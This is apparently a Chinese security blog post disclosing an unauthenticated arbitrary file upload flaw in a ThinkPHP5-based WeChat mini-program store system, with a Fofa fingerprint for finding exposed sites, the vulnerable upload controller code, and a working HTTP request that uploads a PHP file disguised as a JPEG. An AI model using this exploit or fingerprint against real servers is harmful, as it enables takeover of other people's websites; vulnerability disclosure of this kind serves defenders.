某微信万能门店小程序系统存在前台任意文件上传漏洞

某微信万能门店小程序系统存在前台任意文件上传漏洞

原创 Mstir 星悦安全 2024-11-28 03:41

点击上方
蓝字
关注我们 并设为
星标

0x00 前言

  • █ 
    远山起风又起雾 无人知我来时路
     █

  • 万能门店小程序DIY建站无限独立版非微擎应用,独立版是基于国内很火的ThinkPHP5框架开发的,适用于各行各业小程序、企业门店小程序!

  • 万能门店微信小程序不限制小程序生成数量,支持多页面,预约功能等。 本套源码包含多商户插件、点餐插件、拼团插件、积分兑换、小程序手机客服等全套十个插件模块。

  • 支持后台一键扫码上传小程序,和后台通用模板。

  • 增加了:抖音/头条小程序,百度小程序,支付宝小程序,qq小程序,H5端

Fofa指纹:

"/comhome/cases/index.html"

后台

框架:ThinkPHP 5 Debug:False

0x01 漏洞分析&复现

位于 /comadmin/controller/Remote.php 控制器中的onepic_uploade 方法存在通过File()函数上传文件,并且直接通过move()函数将文件移动到目标位置,导致漏洞产生.

//单个图片上传操作
function onepic_uploade($file){
  $thumb = request()->file($file);
  if(isset($thumb)){
    $dir = upload_img();
    $info = $thumb->move($dir); 
    if($info){  
      $imgurl = ROOT_HOST."/upimages/".date("Ymd",time())."/".$info->getFilename();
      return $imgurl;
    }  
  }
}

Payload:

POST /comadmin/Remote/onepic_uploade?file=file HTTP/1.1
Host: 127.0.0.1:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBiKyL9D0p5OtH5zz
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 195
------WebKitFormBoundaryBiKyL9D0p5OtH5zz
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg
<?php phpinfo();?>
------WebKitFormBoundaryBiKyL9D0p5OtH5zz--

0x02 源码下载

标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转

万能门店源码关注公众号发送 241119 获取!

下方二维
码添加好友,回复关键词 
星悦安全
进群

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!